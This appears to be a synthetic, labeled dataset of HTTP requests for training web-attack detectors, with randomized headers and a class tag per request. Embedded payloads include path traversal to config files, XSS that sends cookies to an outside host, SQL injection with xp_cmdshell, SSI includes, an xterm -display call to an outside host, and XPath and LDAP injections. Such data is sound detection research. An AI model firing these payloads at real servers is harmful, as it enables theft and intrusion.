User-Agent: rtboeeA (nuPe6QTbue; evPOni-b)
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 1363x5832
Via: 0.7 29.246.99.140
Transfer-Encoding: gzip
Upgrade: en1/5.2
Warning: 252 130.134.156.172:45 "RhtjL2ig2n" "Sun, 11 Nov 07 01:36:29 GMT"
X-Serial-Number: 9576766349708862183
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37468
Start - Id: 45080
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 247.128.84.30
Connection: close
Accept: text/plain
Accept-Charset: x-mac-korean, iso-8859-8-i;q=0.0, hz-gb-2312;q=0.8, x-mac-chinesetrad, euc-kr
Accept-Encoding: 
Accept-Language: s1IrcA3o-dins8r
Cache-Control: min-fresh=045
Client-ip: 11.179.164.13
Cookie: Sand@uBstyle=602505
Cookie2: $Version="8"
Date: Mon, 14 Feb 05 21:11:30 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: hn3ir5=6tmi9da;eeo5ers=cHndst
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Mon, 14 Nov 05 03:21:58 GMT
If-Unmodified-Since: Sun, 09 May 04 18:25:42 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 0
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM YWhkb3RzaXBtZWRzbXpkNGVhTndhdHJybm5PZnVvaTZpbklyZXJ3U25p
Authorization: Digest response="Bff24B45b3cD5CA5f187d22bFAdDa54F"
Range: 51016-,-10087
Referer: http://www.beetnt.com/vortorgh/tdly1na.php
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/1.9 (X11; U; Unix 9.9; ds-ej; rv:3.2.5) Gecko/37032471
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 003x764
Via: FTP/8.7 www.4pjoba.jpg, HTTP/8.9 www.deza2lzn.tiff
Transfer-Encoding: compress
Upgrade: tTRadh/8.4, hsrdna/9.0, cgtlfu/8.3
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 2196102
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45080
Start - Id: 47133
class: XSS
GET /ob/OwEcsaiE/hGEgJAF4Yz/iteitiiT/M0tDhDuHt/ks9eTtAsloikDxtiebl/9efetrMnpNk4hn2Es/bvGgqa7y63PK_/QXsNhJpN/hSmU._ytJlw/csly.php?masrSaaoetvOn=5725915&endwfe=fnPATPvQt3&YHghomesock_streamhtacceslMwuJm=o.h4Qo&eadlae=o8uw4YfxXa&gue=eeelvllree2ehsttcC&kbeeon=%3Cstyle++++%3E%3C%21--%3C%2Fstyle+++%3E%3Cscript++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.elmana.com%2Fcgi-bin%2Fal.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&abajnulpp=iimg%27tt&mdn1=skA&gestr3imeiw=10&I6n8Q0o0tcnne=A+aefh&t1i=+1j2&bcBN7ySwSVXG=24%2Fre&_Hu.o2RhOpprocessing-instructionr=gkob HTTP/1.1
Host: 154.139.195.121:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.0, utf-7;q=0.5
Accept-Encoding: *
Accept-Language: l2ltb-s;q=0.5, seoah-9ree8s, riensst-t;q=0.8
Cache-Control: no-cache
Client-ip: 209.25.156.191
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="12"
Date: Mon, 11 Dec 06 01:09:59 GMT
ETag: "LcSIlirSRVReo07k6"
Expect: dwai6Nt=atnc48
From: dy0mird@eelb.it
If-Modified-Since: Tue, 15 Apr 08 06:34:26 GMT
If-Unmodified-Since: Fri, 25 Apr 08 02:49:02 GMT
If-Match: *
If-None-Match: "pLcI7SowcJ2H1wjVc"
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 791
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM aXU0YnduSWdoNzllTHA2dzdoNGhvYmlxbFNzbm5oZWNhYWZoN2lzbmVF
Range: -63707,310050-133
Referer: http://iyhha.be/nuSrto/lseeuepo.html
TE: chunked
Trailer: TE
User-Agent: nIDT3GTf http://www.ob5GhIu.com
UA-CPU: 68000
UA-Disp: 9389,112,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 4.4 www.pliGeo4t.gif:73164, HTTP/1.4 www.tiune.shtml, 3.6 245.243.221.123
Transfer-Encoding: identity
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47133
Start - Id: 41540
class: SqlInjection
PUT /eJV24Wjn0/R2wXwANNo5I/ellmaocu/rarkbB5jJH.eQ/nE4Bem9IP0/dWHUs77lQtGT_yy/mes3it7/n18/szjQz-jGWneSz@/4hDTowN.swf? HTTP/1.0
Content-Length: 262
Content-Language: Wp9ecno4,aAZeTin,Esfd5H
Content-Encoding: identity
Content-Location: /eoee.js
Content-MD5: ZXNuZ2RSbXR0Z2k1MHRzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jan 04 06:36:06 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: 93.15.138.77
Connection: vhLend
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: etEe4o-nna
Cache-Control: min-fresh=854
Client-ip: 163.65.132.10
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Thu, 04 Dec 08 22:28:37 GMT
ETag: "qo-CqRFe0Y2GKt.7"
Expect: 100-continue
From: nqoEyii@sdULboEa.uk
If-Modified-Since: Thu, 22 Nov 07 18:16:54 UTC
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 577
MIME-Version: 5.5
Pragma: no-cache
Authorization: Basic ZWFoZTplZXRhc05ocw==
Range: 57094-3
Referer: /eyair6.gz
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: NieurtptTg/2.1.5.7
UA-CPU: StrongARM
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: identity
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 

dn='  )   UNION   ALL  SELECT 'mRfalabb',6,29,'ioIisrn',07  FROM     ldet9eaila    WHERE (    '' = '&qnnE=ft&0an=iic6-n3iDmUp&sataltspTlb=ikEscriptlsugo&feiue12ttlgtee5=6315&iion=yUhI3L&bnX=ede4sfh&LGh.4J1Q=tm@Cjis&sh5x0ratfot6=fo

End - Id: 41540
Start - Id: 41084
class: SqlInjection
GET /wotst/DPLci/a_UOVJQwn0fe/2ptnoyl4zndfrxrcJ/CAI0P.V/uy2jGtC/t3wa.html?aUHfR=exec+++++xp_cmdshell+++++%27%22Ltu%22+%3E%3E++++script.vbs%27 HTTP/1.1
Host: www.rhs2hde.fr:2
Connection: rjepnvO
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: 9Frstu5=6Lr
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="624"
Date: Mon, 06 Oct 08 16:28:10 CET
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 05 Nov 04 18:58:00 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: "h@d9qkxJWUcny--Q"
If-None-Match: "@0LlyPjLPfAUs4TH"
If-Range: Wed, 18 Nov 09 08:08:09 GMT
Max-Forwards: 5
MIME-Version: 7.6
Pragma: stxR2zt=afm
Proxy-Authorization: Digest username="seeg"
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: /9ReduA.msf
TE: trailers
Trailer: From
User-Agent: Mozilla/3.9 (compatible; Konqueror/5.2; Win98; 1t5oNmk; l2ctr)
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: 0.5 www.cpnat.shtml, tu3nt/9.5 210.143.183.53, 8.3 221.231.92.90
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41084
Start - Id: 35936
class: PathTransversal
GET /8mr8HiPMtInioeI2i4/lsqi/Yh2Yf/DL2bHRDWAbinfwhereRp/abqtvehsoaE/anc1Epzersotixtltiia/2Qr._yGGrTj-vuk20/gbrsi5/Zjautoexecp1Ohtpass8z1P/sD3gsW-x/hD@wTHqiNw.CV@vw@db.php4?ei39o=o8abt&fMwU=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.1
Host: 132.222.56.40:9
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-2;q=0.7, iso-8859-4, big5, ks_c_5601-1987, utf-7;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 111.208.189.237
Cookie: osEypsd=ttbr e s8s;itrot=lvar=rcornehtpass betweentmetar4I;kvnph-xhtacces0=sgncdh;deoagpt=36;yUVPB=54650086;slnjnf=8usrlinkd+:o
Date: Wed, 14 Apr 04 15:13:53 UTC
ETag: W/"KVz0darYpD@iPYSQ"
From: be1oUn2@8heteu9.de
If-Modified-Since: Wed, 19 May 04 11:40:39 CET
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: "4@UbJGhOewivY17@Q-pA"
If-None-Match: "BuzDP88tDg6pyUzZC7"
If-Range: Thu, 12 Feb 09 24:36:05 GMT
Max-Forwards: 93
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest response="286B3b4eABfad87Ccb98fB0a08cbaC4c"
Range: -7654,73-181
Referer: /ctn0p4.dll
TE: trailers
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 6.5; tz-h8; rv:3.4.0) Gecko/57384549
UA-CPU: Sparc
UA-Disp: 684,759,32
UA-Color: color16
UA-Pixels: 769x5162
Via: 2.5 83.23.86.116
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35936
Start - Id: 48790
class: XPathInjection
GET /9QcH8WlOXS/yXHVap8ka@ahHj/oso7egopctoaih/06hWe51--IS1LgXTPmPG/-GwhereJJb0VA/esmehel5f8ewwo/iiehe/OVoSmocha3lsHY/tkc4mo/arrtc1jvlnogaaIdweme.css?aeern=an&rsIic5b5i27=619429084&aa6igh3nsert=e7I&iaaHhfcsA=498324&iblroRmr=33341&iLapeq=465721516&sTiMtmNyCeema=geH3A07GdvQw&t5Eeaenaa7ihs=rq3PUWsve_&rHrn0mobdeb=3&pp9o7tde=uaHmp%27++++or+++++mAhasN%2Fz%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D68%5D++or++++%27mwrh%27++++%3D++%27&tiuKrlodliehs=92502540&nefvea=ltt%3Akens33 HTTP/1.1
Host: 166.59.12.138
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: utf-7;q=0.8, koi8-r, koi8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: dPb=92368;nb=n;2oE6mueYettsaaf=vyv
Cookie2: $Version="7"
Date: Tue, 21 Jul 09 19:32:14 GMT
ETag: W/"ss3oYqwA5LRwWDU"
Expect: elan
From: iinongn@mnxs.it
If-Modified-Since: Sun, 23 Jul 06 07:48:35 UTC
If-Unmodified-Since: Sat, 27 Aug 05 06:17:41 GMT
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: /tt4RUc.php3
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 1.6; 3r-ae; rv:2.2.1) Gecko/18659083
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: 9.2 www.ngntiony.tiff, 1.0 www.altn.tiff, 4.9 www.laia7.gif
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 538 www.cErriaih.tiff:9 "osyScc8wde9ls" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48790
Start - Id: 43349
class: OsCommanding
GET /aA39bPAHP/vZqv5hLjHI/eRbske/wi8noleuE0/tB/dzp4Slij90ci.jpeg?oVoo6Nnoaak26=%250A+++++xterm+++-display+www.atieralaveat.com%3A0.0++++&mlAot8sareorU=50365 HTTP/1.0
Host: www.efmir8oc.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: sole-h;q=0.5, otula-oaah3ert;q=0.0, oaneAaba-i
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Sun, 05 Aug 07 06:37:54 GMT
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Sun, 01 Apr 07 01:49:14 CET
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: "k8Ow660K2iP7Z1Taht4"
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: Tue, 28 Oct 08 04:25:18 CET
Max-Forwards: 74
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Basic ZWhyb3RwaW86dHphM2w=
Range: -3
Referer: /tp7merie/s4ha.pl
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 3.4; 4a-el; rv:8.3.2) Gecko/59096071
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: thyso/9.2 184.230.239.38, 2.2 50.121.243.139
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43349
Start - Id: 36373
class: PathTransversal
POST /m5-HarbczQcW/t0kcmxtcO/i9ch/G.wK.mspx? HTTP/1.0
Content-Length: 250
Content-Language: a,27nutwl,rytttdoh
Content-Encoding: gzip
Content-Location: /rlsl/Meuw/rtanemJ.exe
Content-MD5: STdhRXNzVHRwYXJyZXFiRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Jan 06 23:49:26 GMT
Host: www.nvb1h2ned.com:5334
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.5
Accept-Encoding: e:/.htaccess~
Accept-Language: Enou0-aaohhe, nw-iQhi, snoerae-o;q=0.2
Cache-Control: max-stale
Cookie2: $Version="3"
Date: Wed, 08 Feb 06 04:49:31 CET
ETag: "E7m-S6P3VL1I_pjZA0Jt"
If-Unmodified-Since: Wed, 20 Apr 05 23:07:40 CET
If-Match: *
If-None-Match: "1y1G_hfUXx9tmenOkpg"
If-Range: Fri, 11 Jun 04 02:24:21 UTC
Max-Forwards: 079
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /inone.jsp
User-Agent: Mozilla/7.4 (Windows; U; Win98 8.2; ik-e0; rv:4.8.5) Gecko/53635595
UA-CPU: 68000
Via: FTP/9.6 www.9rXarm.tiff
X-Serial-Number: 40169303930821255

FnHRVyr=fiyebn10d)mrnsr&kul3rd=OsoTleexab4&ketptobtds1=dao&cAers3ne=yoti&sc91d0setrre=c9nS&dcC59Eomabsnue=gl8ZcuRV.&EMsdral7=ttatosa&t3[lsl&btiivcegufhitl=307&ae=vMfXmG-&et8thohwi9tfauT=-ypws t$telnethk&rpositionoe&maaoshtnaioomme=oVc0y-rjr

End - Id: 36373
Start - Id: 35698
class: XPathInjection
GET /kWOHpFr/nYRjyPQmrYU9aMWoIgkQ/fzEZhl.S2lufl_PyqpCP/wfziRl/88wa_IJawhered/WP.Nuselectvbscript6/6iqrf8newkp/aiHscyynnIssmtg/3tTso7lvndqmou7t/libz0g3Sk/iLVN.swf?cA=eldueTar0yHt&gIp=t8yfi&np=90989554&P.O0rwp-q7YKL8=fTtcxlXme0atarob&defs=5.UZ3pyDO&cdet2Aaiai8i=%28i+++++%3C+count%28Ao%2Fchild%3A%3Atext%28%29%29++++and+++++j+++%3C+++++count%28eomy%2Fchild%3A%3Acomment%28%29%29+++and++++k+%3C+++++count%28tevoeg%2Fchild%3A%3A*%29+++%29&et=7%3Aca+enShKddae&5meopinlon=nsgors4uuc&7lrhnpd=64&cdne=5751&eolo1crgrl=nfreydeiDre HTTP/1.0
Host: 227.156.203.42
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: us-ascii, us-ascii, iso-8859-3;q=0.3, x-mac-turkish;q=0.6, iso-8859-1;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: dhectsc-2rr;q=0.8, 3ubuae-aa9rgwV;q=0.7, ejmi-ePuI;q=0.0
Cache-Control: max-age=552
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Sun, 18 Mar 07 03:56:27 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: aebhq
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Sun, 13 Jun 04 22:51:34 GMT
If-Match: *
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.6
Pragma: Qns=8p8b8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: http://eh6ioait.ch/etwet/htocu/saedui/nwnn/e3grh.pl
TE: trailers
Trailer: If-Range
User-Agent: Pnge (e@zf2Uzs; nwDTZO-7; h3IRh74; cTwgBFv)
UA-CPU: Sparc
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35698
Start - Id: 42716
class: SqlInjection
PUT /ed1BX4GewVQ04ACWfNt/YIITd_Z1dv/e0-s_n-jfZDj6lRkie3p/x@oRgK68/wRzniosmrLema0mwnma/mqnfGlR@S3i/4rKD9OR-rkFwP/penad/ajerI0lar/epLxm4n.asp? HTTP/1.1
Content-Length: 28
Content-Language: f,6k,tt
Content-Encoding: compress
Content-Location: http://www.ooupi.be/0cpru0e/uog3d/odnhO9/dtinWnk/MNelue.asmx
Content-MD5: ZXJidG9hckVocnJkbnJoOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 04 10:18:27 GMT
Last-Modified: Wed, 22 Mar 06 17:50:51 CET
Host: 227.90.8.116
Connection: saemZue
Accept: */*
Accept-Charset: iso-8859-5, utf-7;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: h-lh
Cache-Control: no-store
Client-ip: 55.142.21.136
Cookie: rlSohdaUoruOo=yN
Cookie2: $Version="75"
Date: Sun, 13 Aug 06 06:12:56 CET
ETag: "IBzhLnX6odwA8It@0R"
Expect: 5tyeuid
From: eieei@e8Bn78.net
If-Modified-Since: Tue, 06 Dec 05 19:37:24 GMT
If-Unmodified-Since: Mon, 06 Mar 06 01:49:12 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 31 Dec 07 06:24:21 CET
Max-Forwards: 688
MIME-Version: 9.7
Pragma: eoAvrre='0mnsEdni'
Range: 178852-558277,2-2372,-0020
Referer: /tniei6ut/ythg/nabSn3/ea6w.php4
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: '    OR    ''=    '
UA-Disp: 966,2764,32
UA-Color: color16
UA-Pixels: 123x436
Via: 8.9 180.109.211.80
Transfer-Encoding: gzip
Warning: 248 64.93.227.168:634 "DanimetRfrErrctntc" 
X-Serial-Number: 31876776688565711
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sht=zemIocn=&tnuaoviRa=156

End - Id: 42716
Start - Id: 45346
class: PathTransversal
GET /nnotlnexinilaevtsb2/andBMBAa3/nlvde7Db1s3mbaores0/N5vaeolxitiyau4/2br4iSdqhsaa/cO.PtG1rL9ciNe9.Ww.cfm?oeg=6kSmag6ighdph&nlHcadptP=wr3mel8cdXtr8rew&zl7ui=lia0la&gi=9v%40 HTTP/1.0
Host: 11.48.74.81:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: macintosh;q=0.1, shift_jis
Accept-Encoding: *
Accept-Language: 8lqs3-Aa9;q=0.0
Cache-Control: no-store
Cookie: ce5asatqpr=944947;7e0Vhome-= 2(nsytmpufdrtr;vTRboptpoO=sv_;Ntarueeyeyaai=gHUalma;hrjlt=/../../../../../../../Inetpub/iissamples/ngieen/angegeteas/riseil/le.php
Date: Sun, 26 Jul 09 20:35:58 UTC
ETag: W/"Rwgc.qY2cd9kTbnM8s"
Expect: 100-continue
If-Modified-Since: Mon, 06 Aug 07 23:36:12 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Jan 07 07:00:40 GMT
Max-Forwards: 4045
Pragma: no-cache
Proxy-Authorization: Basic aDhsTG1lbmg6bXNzaWVhZXU=
Referer: http://b1adbd4n.be/9t8gntei/fwna/aieRenhs.wav
User-Agent: rJLe7U6 http://www.stve.de
UA-Disp: 8452,4807,32
UA-Color: color8
Via: 5.0 37.15.54.44
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45346
Start - Id: 42749
class: SqlInjection
PUT /7Raistalhes.js? HTTP/1.0
Content-Length: 70
Content-Language: g6lx,ioiu
Content-Encoding: gzip
Content-Location: /ssas/nnDoitY/ecyad/yiahT91/mLo0xxn.mpeg
Content-MD5: dGlldDNyZUVsaXVybmh3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jan 08 05:13:27 UTC
Last-Modified: Tue, 17 Apr 07 17:02:03 CET
Host: www.ntwdusNCHl.de
Connection: 5ci4dsen
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: SneLdMo3='eobm'
Client-ip: 98.206.117.244
Cookie: zenabfhSctretss=OR 'E93ee1a'   LIKE  'Sim%';exl70dihrttfIe=m_E6fR;0nRsreseohTSs=ibes;86mail2cMxEG=logljt\vo2p
Cookie2: $Version="613"
Date: Fri, 29 May 09 22:02:47 UTC
ETag: "4t18lCZ0THj7QqO_u"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Sat, 01 Nov 08 10:20:44 GMT
If-Unmodified-Since: Thu, 21 Jan 10 22:52:07 CET
If-Match: "9Arc_SaW6tEqqCJF75ss"
If-None-Match: "u8-AW@05bdekR@Q7"
If-Range: "6w3T_YxE70-A9GX1@KH"
Max-Forwards: 94
MIME-Version: 7.2
Pragma: 6intrtm='uhokt5'
Proxy-Authorization: iurtN aqadDau=s2ape
Authorization: eeUKkv AhoaSg=ie3L
Range: -47883,920284-33663,-174
Referer: http://n7tMd.org/tooehlA/sbaxhla/aokM6eL.dll
TE: gzip;q=0.2,gzip;q=0.4
Trailer: Referer
User-Agent: oe6ee/0.9.9.8
UA-CPU: StrongARM
UA-Disp: 9938,911,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x5874
Via: 6.4 www.ga9ladRt.shtml
Transfer-Encoding: gzip
Upgrade: pIH2t/5.2, nJs/4.7
Warning: 659 226.226.230.165:60604 "TKats3angumn" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 1961149
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

rTd50etoZu=rnyimocha%qo &mtf8l=ruone&rTn0r=27&d1ouRbty9tahii=fotdaxa

End - Id: 42749
Start - Id: 39029
class: LdapInjection
PUT /eEidt/pacceptSm9eY_4Kf/mB8RBozJ0D.sh? HTTP/1.1
Content-Length: 58
Content-Language: bs9Wwa
Content-Encoding: identity
Content-Location: /snYo/rdoathnS/atoetcoa/CtrmSam.tar
Content-MD5: ZWF0dnlhdGJjenRzeXN0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Feb 04 14:05:51 GMT
Last-Modified: Wed, 06 Oct 04 20:32:43 CET
Host: 208.187.13.108
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-1, big5;q=0.8
Accept-Encoding: 
Accept-Language: Hticbt-xlhrab, 1aacs-srwsgn;q=0.3, Et-Vsne, QLlr6-ogc;q=0.2, yh-sn93nU;q=0.1
Cache-Control: only-if-cached
Client-ip: 102.168.123.142
Cookie: Chmownoos3=oqGzTA;vd0RG=wcps4uBtV;iiEIeqzuf1tT=tenwpie%umthhhchildr;Id20dI-SYG=iacoqedlaoe;balTneoi=ae
Cookie2: $Version="35"
Date: Wed, 01 Oct 08 04:40:30 CET
ETag: W/"S@-nxPLI7Fg30dSC"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Sat, 11 Sep 04 06:24:13 CET
If-Unmodified-Since: Sun, 30 Jul 06 08:56:36 CET
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Sun, 13 Nov 05 08:54:20 CET
Max-Forwards: 0786
MIME-Version: 9.1
Pragma: sebh9zS='Lrv'
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Range: -15502
Referer: /ce3n/i3haedt/diam.zip
TE: chunked;q=0.7,gzip,trailers
Trailer: Authorization
User-Agent: ) (  |  (displayName=had*)(name   =had*   )( mail=had*  )
UA-CPU: PowerPC
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7332x461
Via: 4.7 142.39.252.189:99419, ebrAin/5.2 www.9dPx8a.html
Transfer-Encoding: deflate
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -------------------
~~~~~: ~~~~~~~~~~~

KJGgHAQ2n=sSlsvWl67&en=hQfplxUwM&BT%uY=e9h0i%3F5a5+epasswd

End - Id: 39029
Start - Id: 45961
class: PathTransversal
GET /5EFmro2w2aas/nI4lmi89ji4hfYiliK/eByDZebga3XX.jpg?nLsoenaf=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fne%2Fieit%2Fllasraares%2Fasetnise.cgi&wmbTdhS=8445369787&iCnowcnspmh=sngkek7retaoo&vINJhH_-null=icB&nftlseatBen=w&RWdsn=5&huhpxtybizcv=2&Tm2Zv3@D=xgK9 HTTP/1.0
Host: www.wrdhnbsdn.st
Connection: ebefj
Accept: */*;q=0.4
Accept-Charset: windows-1252, utf-8, iso-8859-15
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="06"
Date: Sun, 06 May 07 20:52:58 GMT
If-Unmodified-Since: Sat, 03 Apr 10 09:22:26 UTC
